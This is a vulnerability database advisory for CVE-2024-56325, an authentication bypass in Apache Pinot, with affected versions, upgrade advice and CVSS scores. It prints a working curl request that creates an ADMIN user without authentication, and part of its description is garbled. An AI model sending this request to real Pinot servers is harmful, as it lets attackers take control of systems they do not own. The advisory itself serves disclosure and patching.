Mend.io Vulnerability Database
The largest open source vulnerability database
What is a Vulnerability ID?
New vulnerability? Tell us about it!
CVE-2024-56325
April 01, 2025
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Affected Packages
https://github.com/apache/pinot.git (GITHUB):
Affected version(s) >=release-0.1.0 <release-1.3.0
Fix Suggestion:
Update to version release-1.3.0
org.apache.pinot:pinot-broker (JAVA):
Affected version(s)
Fix Suggestion:
Update to version 1.3.0
org.apache.pinot:pinot-controller (JAVA):
Affected version(s) >=0.1.0 <1.3.0
Fix Suggestion:
Update to version 1.3.0
org.apache.pinot:pinot-controller (JAVA):
Affected version(s) >=0.1.0 <1.3.0
Fix Suggestion:
Update to version 1.3.0
org.apache.pinot:pinot-common (JAVA):
Affected version(s)
Fix Suggestion:
Update to version 1.3.0
Additional Notes
The description of this vulnerability differs from MITRE.
Do you need more information?
Contact Us
CVSS v4
Base Score:
9.3
Attack Vector
NETWORK
Attack Complexity
LOW
Attack Requirements
NONE
Privileges Required
NONE
User Interaction
NONE
Vulnerable System Confidentiality
HIGH
Vulnerable System Integrity
HIGH
Vulnerable System Availability
HIGH
Subsequent System Confidentiality
NONE
Subsequent System Integrity
NONE
Subsequent System Availability
NONE
CVSS v3
Base Score:
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality
HIGH
Integrity
HIGH
Availability
HIGH
Weakness Type (CWE)
Authentication Bypass Using an Alternate Path or Channel
EPSS
Base Score:
30.77